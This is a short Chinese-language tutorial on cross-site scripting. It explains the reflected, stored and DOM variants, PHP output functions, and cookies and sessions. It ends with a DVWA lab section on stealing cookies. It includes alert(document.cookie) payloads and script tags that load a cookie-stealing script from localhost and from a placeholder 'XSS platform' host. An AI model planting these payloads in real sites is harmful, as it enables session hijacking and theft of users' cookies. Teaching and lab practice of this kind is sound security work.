XSS漏洞

XSS 漏洞简介

跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。
xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过用户本地浏览器执行的，所以xss漏洞关键就是寻找参数未过滤的输出函数。

常见的输出函数有： echo printf print print_r sprintf die var-dump var_export.

xss 分类：（三类）
反射型XSS：<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。

存储型XSS：<持久化> 代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，每当有用户访问该页面的时候都会触发代码执行，这种XSS非常危险，容易造成蠕虫，大量盗窃cookie（虽然还有种DOM型XSS，但是也还是包括在存储型XSS内）。

DOM型XSS：基于文档对象模型Document Objeet Model，DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI ，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM XSS漏洞。

理论基础

前端与后端，前台与后台的概念

前端是写代码给浏览器看的。后端是写代码给服务器看的。
简单的说网站前端负责是东西是网站用户可见的东西，如网页上的特效、网页的布局、图片、视频等内
容。网站后端是网站逻辑的设计和实现还有用户及网站的数据的保存和读取。
前台，后台，指的是具体页面。
前台，是用户直接能看到的页面，所有人都可以访问。
后台，是有权限的运营人员或特殊用户（比如淘宝卖家）用权限登陆后才看得到的页面，除了能看到其
他人看不到的报表外，在后台还能修改前台显示给用户看的内容。

Cookie与session的作用

Cookie是客户端保存用户信息的一种机制，用来记录用户的一些信息，实际上Cookie是服务器在本地机器上存储的一小段文本，并随着每次请求发送到服务器。
Cookie技术通过请求和响应报文中写入Cookie信息来控制客户端的状态
Cookie会根据响应报文里的一个叫做Set-Cookie的首部字段信息，通知客户端保存Cookie。当下客户端再向服务端发起请求时，客户端会自动在请求报文中加入Cookie值之后发送出去之后服务端发现客户端发送过来的Cookie后，会检查是那个客户端发送过来的请求，然后对服务器上的记录，最后得到了之前的状态信息。
//cookie.php
session是服务器端用于验证用户权限的一种凭证。存于服务端，在进行数据交互时使用的。服务器会发放用以识别用户的Session ID。可以把Session ID 想象成一种用以区分不同用户的唯一Id。
//session.php

XSS 漏洞原理

反射型XSS

又称非持久型XSS，这种攻击方式往往具有一次性，只在用户单击时触发。于是单独出现等反射xss常被用作钓鱼，窃取用户cookie等。

/xss.php ?<script>alert(document.cookie)</script>

存储型XSS

和反射性XSS的即时响应相比，存储型XSS则需要先把利用代码保存在比如数据库或文件中，当web程序读取利用代码时再输出在页面上执行利用代码。但存储型XSS不用考虑绕过浏览器的过滤问题，屏蔽性也要好很多。

//storagexss.php 
<script>alert(document.cookie)</script>

DOMXSS

DOM(Document object model)，使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。
DOM型XSS其实是一种特殊类型的反射型XSS，它是基于DOM文档对象的一种漏洞。DOM型XSS是基于js上的。不需要与服务器进行交互

//domxss.html#javascript:alert(1)

XSS 盗取COOKIE

搭建DVWA环境

//getcookie.js
//xss_getcookie.php
//<script src=http://127.0.0.1/xss/getcookie.js></script>

找XSS平台
在反射型XSS处填写

<script src=http://xss.xxx.xxx/js?id=bIBzKkiFNf></script>

XSS cheat sheet

http://www.xenuser.org/xss-cheat-sheet/